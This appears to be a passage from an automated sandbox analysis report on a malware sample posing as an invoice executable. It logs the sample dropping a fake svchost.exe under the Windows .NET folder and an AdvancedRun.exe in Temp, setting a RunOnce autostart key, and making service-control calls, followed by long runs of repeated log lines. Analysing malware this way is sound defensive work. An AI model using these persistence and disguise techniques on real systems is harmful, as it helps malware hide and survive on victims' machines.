Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Code function: 0_2_010F17DB push FFFFFF83h; ret
Source: C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe	Code function: 10_2_0040B550 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe	Code function: 10_2_0040B550 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe	Code function: 10_2_0040B50D push ecx; ret
Source: C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe	Code function: 11_2_0040B550 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe	Code function: 11_2_0040B550 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe	Code function: 11_2_0040B50D push ecx; ret

Source: initial sample	Static PE information: section name: .text entropy: 6.86065163545
Source: initial sample	Static PE information: section name: .text entropy: 6.86065163545

Persistence and Installation Behavior:

Drops PE files with benign system names

Show sources

Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe

File created: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe

Jump to dropped file

Drops executables to the windows directory (C:\Windows) and starts them

Show sources

Source: C:\Windows\explorer.exe

Executable created and started: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe

Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	File created: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe			Jump to dropped file
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	File created: C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe			Jump to dropped file

Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe

File created: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe

Jump to dropped file

Boot Survival:

Creates an autostart registry key pointing to binary in C:\Windows

Show sources

Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe

Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce WtdedqepeLXPvCct

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe

Code function: 10_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,

Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce WtdedqepeLXPvCct	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce WtdedqepeLXPvCct	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce WtdedqepeLXPvCct	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce WtdedqepeLXPvCct	Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Source: C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe

Code function: 10_2_00408E31 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
